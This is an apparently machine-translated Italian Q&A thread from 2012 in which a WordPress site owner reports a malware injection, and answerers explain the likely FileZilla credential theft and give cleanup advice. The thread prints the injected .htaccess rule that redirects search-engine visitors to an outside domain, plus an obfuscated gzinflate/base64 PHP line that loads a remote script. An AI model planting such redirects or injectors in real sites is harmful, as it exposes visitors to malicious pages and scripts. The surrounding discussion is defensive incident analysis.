Come impedire al mio sito web di ricevere attacchi di iniezioni di malware?

Naviga le tue risposte
8

Il mio sito web è stato vietato come sito Web di malware da parte di Google. Quando ho controllato il codice, ho scoperto che alcuni codici hanno iniettato molti file sul mio server. Ho pulito tutto manualmente, modificato tutti i file sul mio server (hosting condiviso) cercando un codice dal codice inserito in tutti i file. Anche il file .htaccess è stato modificato dall'hacker.

Nel sito web c'erano due installazioni di WordPress, in due diverse sottocartelle della radice del sito Web, che non erano state aggiornate. Ho aggiornato entrambi.

Quindi Google ha rimosso il divieto sul mio sito web.

Ieri ho scoperto che il file .htaccess sul mio sito web è stato nuovamente modificato dall'attaccante. Ecco il codice: 

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

Ho cercato "b58b6f" in tutti i file, ma non ne trovo nessuno. Penso che questo sia l'unico file modificato dall'attacco più recente. Ho cancellato questo file .htaccess, dato che non ne ho bisogno.

In che modo l'hacker è riuscito a hackerare il mio sito web? Come impedire che ciò accada di nuovo? Come posso rendere più sicuro il mio sito web?

    
posta Debiprasad 22.06.2012 - 10:17
fonte

3 risposte

7

Sembra che il malware che hai riscontrato sia il "daysofyorr.com virus" o MW: HTA: 7 .

Sto suggerendo di utilizzare FileZilla come client FTP. In tal caso, è necessario sapere che FileZilla memorizza le credenziali dei propri siti Web in formato testo. Un virus potrebbe aver avuto accesso alle tue credenziali e quindi aver effettuato l'accesso a tutti i tuoi siti web registrati cercando l'installazione di WordPress per aggiornare i file inserendo questo codice.

Ora dovresti:

  • Cerca nel tuo computer eventuali virus, malware, ecc.
  • Cambia la password FTP di tutti gli account FTP registrati salvati in FileZilla
  • Alla fine usa un sistema FTP migliore, come WinSCP

A late comment, but I suspect that you use FileZilla as your FTP client. Did you know that FileZilla stores your FTP site credentials (site/user/pass) in a plain text file in the %APPDATA% folder?

And I also suspect there is a hidden malware on your computer. It grabbed your FileZilla credential files, and used them to change your header.php file in your theme folder. In fact, I suspect that you will find changed header.php in all of your themes folders.

And if you are technical enough to look at your FTP log files, you will find the access to those files: a download, then an upload of the changed files. You might also find some random file names that were uploaded to your root ('home') folder, although those files were deleted by the hacker.

And, you will find that the IP address in the FTP log of the hacker was from China.

Recommendation: uninstall FileZilla, delete the FileZilla folder from %APPDATA% folder, change your FTP passwords (and your host passwords). And look for any changed header.php, footer.php, and wp-settings.php files.

Per il "virus daysofyorr.com", puoi confermare questo controllando alcuni dei tuoi file PHP (come index.php ), se trovi questo codice: 

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#

Questo è tutto!

Per informazioni, traduci in: 

<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>

Il che sembra portare a 404 al giorno d'oggi.

    
risposta data 22.06.2012 - 10:37
fonte
2
  1. Controlla i registri per vedere se riesci a capire se è stato compromesso
  2. Verifica che il tuo Wordpress e tutti i plugin siano aggiornati. Dal momento che Wordpress è un sistema così comunemente utilizzato è abbastanza incline alle vulnerabilità.
  3. Se non riesci ancora a capire che cosa è successo, potrebbe essere utile contattare la società che fornisce il tuo hosting condiviso e renderli consapevoli del problema, poiché potrebbe essere il risultato di un'applicazione non aggiornata o qualcosa che stanno ospitando
risposta data 22.06.2012 - 10:28
fonte
1

  1. Se la tua società di hosting ha una propria versione di wordpress che aggiorna costantemente, ti consiglio di andare con VS una nuova installazione da solo. La probabilità verrebbe ridotta a causa della compromissione, poiché molto probabilmente avresti accesso solo tramite un pannello di amministrazione.

  2. Come per Filezilla, supporta SFTP e FTPS, quindi potrebbe essere un'altra opzione se l'host supporta un FTP crittografato.

  3. Infine potresti essere in grado di bloccare gli intervalli IP di dire al di fuori del Nord America che potrebbero aiutare a bloccare gli attacchi poiché la maggior parte degli attacchi proviene dall'estero per fare di solito delle vie legali che non vale la pena seguire.

risposta data 22.06.2012 - 19:44
fonte

Leggi altre domande sui tag

L'apertura di entrambi TCP / UDP è meno protetta rispetto a TCP o UDP quando necessario e perché? YubiKey o autenticatore di Google?